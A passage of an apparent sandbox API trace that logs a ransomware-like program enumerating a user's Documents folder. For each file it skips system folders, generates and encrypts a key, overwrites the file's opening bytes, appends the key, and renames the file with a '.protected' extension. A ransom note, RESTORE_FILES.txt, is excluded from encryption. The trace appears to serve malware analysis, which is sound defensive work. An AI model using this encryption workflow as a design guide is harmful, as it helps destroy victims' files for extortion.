halpmcxz\\documents\\qoqssp_xots8.xlsx.protected")) returned 1 [0091.609] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Windows") returned -1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Program Files") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="Program Files (x86)") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="$Recycle.bin") returned 1 [0091.609] lstrcmpiW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="System Volume Information") returned -1 [0091.609] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.609] StrStrIW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".protected") returned 0x0 [0091.609] lstrcmpW (lpString1="Qvu78VlOA0zogdpA.xlsx", lpString2="RESTORE_FILES.txt") returned -1 [0091.609] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.609] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".txt") returned 0x0 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".rar") returned 0x0 [0091.610] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx") returned 65 [0091.610] StrStrW (lpFirst="Qvu78VlOA0zogdpA.xlsx", lpSrch=".zip") returned 0x0 [0091.610] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.611] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.611] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.611] CloseHandle (hObject=0xb4) returned 1 [0091.611] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx.protected") returned 75 [0091.611] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Qvu78VlOA0zogdpA.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qvu78vloa0zogdpa.xlsx.protected")) returned 1 [0091.612] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Windows") returned -1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Program Files") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="Program Files (x86)") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="$Recycle.bin") returned 1 [0091.612] lstrcmpiW (lpString1="RKpxl.xlsx", lpString2="System Volume Information") returned -1 [0091.612] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.612] StrStrIW (lpFirst="RKpxl.xlsx", lpSrch=".protected") returned 0x0 [0091.612] lstrcmpW (lpString1="RKpxl.xlsx", lpString2="RESTORE_FILES.txt") returned 1 [0091.612] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.612] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.613] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".txt") returned 0x0 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".rar") returned 0x0 [0091.613] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx") returned 54 [0091.613] StrStrW (lpFirst="RKpxl.xlsx", lpSrch=".zip") returned 0x0 [0091.613] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.614] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.614] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.614] CloseHandle (hObject=0xb4) returned 1 [0091.614] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx.protected") returned 64 [0091.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\RKpxl.xlsx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rkpxl.xlsx.protected")) returned 1 [0091.616] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Windows") returned -1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Program Files") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="Program Files (x86)") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="$Recycle.bin") returned 1 [0091.616] lstrcmpiW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="System Volume Information") returned 1 [0091.616] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.616] StrStrIW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".protected") returned 0x0 [0091.616] lstrcmpW (lpString1="TBzgIHfG1BHL-r6.odt", lpString2="RESTORE_FILES.txt") returned 1 [0091.616] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.616] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.616] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".txt") returned 0x0 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".rar") returned 0x0 [0091.617] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt") returned 63 [0091.617] StrStrW (lpFirst="TBzgIHfG1BHL-r6.odt", lpSrch=".zip") returned 0x0 [0091.617] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.628] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.628] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.628] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.628] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.629] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.629] CloseHandle (hObject=0xb4) returned 1 [0091.629] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt.protected") returned 73 [0091.629] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\TBzgIHfG1BHL-r6.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tbzgihfg1bhl-r6.odt.protected")) returned 1 [0091.630] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Windows") returned -1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Program Files") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="Program Files (x86)") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="$Recycle.bin") returned 1 [0091.630] lstrcmpiW (lpString1="u3y-.docx", lpString2="System Volume Information") returned 1 [0091.630] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.630] StrStrIW (lpFirst="u3y-.docx", lpSrch=".protected") returned 0x0 [0091.630] lstrcmpW (lpString1="u3y-.docx", lpString2="RESTORE_FILES.txt") returned 1 [0091.630] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.630] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.633] StrStrW (lpFirst="u3y-.docx", lpSrch=".txt") returned 0x0 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.633] StrStrW (lpFirst="u3y-.docx", lpSrch=".rar") returned 0x0 [0091.633] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx") returned 53 [0091.634] StrStrW (lpFirst="u3y-.docx", lpSrch=".zip") returned 0x0 [0091.634] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.634] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.634] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.635] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.635] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.635] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.635] CloseHandle (hObject=0xb4) returned 1 [0091.635] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx.protected") returned 63 [0091.635] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\u3y-.docx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\u3y-.docx.protected")) returned 1 [0091.636] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Windows") returned -1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Program Files") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="Program Files (x86)") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="$Recycle.bin") returned 1 [0091.636] lstrcmpiW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="System Volume Information") returned 1 [0091.636] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.636] StrStrIW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".protected") returned 0x0 [0091.636] lstrcmpW (lpString1="WEVO2lAcftiAPXrEeW.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.636] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.636] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".txt") returned 0x0 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".rar") returned 0x0 [0091.637] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx") returned 67 [0091.637] StrStrW (lpFirst="WEVO2lAcftiAPXrEeW.pptx", lpSrch=".zip") returned 0x0 [0091.637] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.638] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.638] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.638] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.638] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.638] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.639] CloseHandle (hObject=0xb4) returned 1 [0091.639] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx.protected") returned 77 [0091.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WEVO2lAcftiAPXrEeW.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wevo2lacftiapxreew.pptx.protected")) returned 1 [0091.640] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Windows") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Program Files") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="Program Files (x86)") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="$Recycle.bin") returned 1 [0091.640] lstrcmpiW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="System Volume Information") returned 1 [0091.641] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.641] StrStrIW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".protected") returned 0x0 [0091.641] lstrcmpW (lpString1="yIIZHVeyCE2tIEuQQ.pptx", lpString2="RESTORE_FILES.txt") returned 1 [0091.641] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.641] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yiizhveyce2tieuqq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".txt") returned 0x0 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".rar") returned 0x0 [0091.642] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\yIIZHVeyCE2tIEuQQ.pptx") returned 66 [0091.642] StrStrW (lpFirst="yIIZHVeyCE2tIEuQQ.pptx", lpSrch=".zip") returned 0x0 [0091.642] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.643] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.643] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.643] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 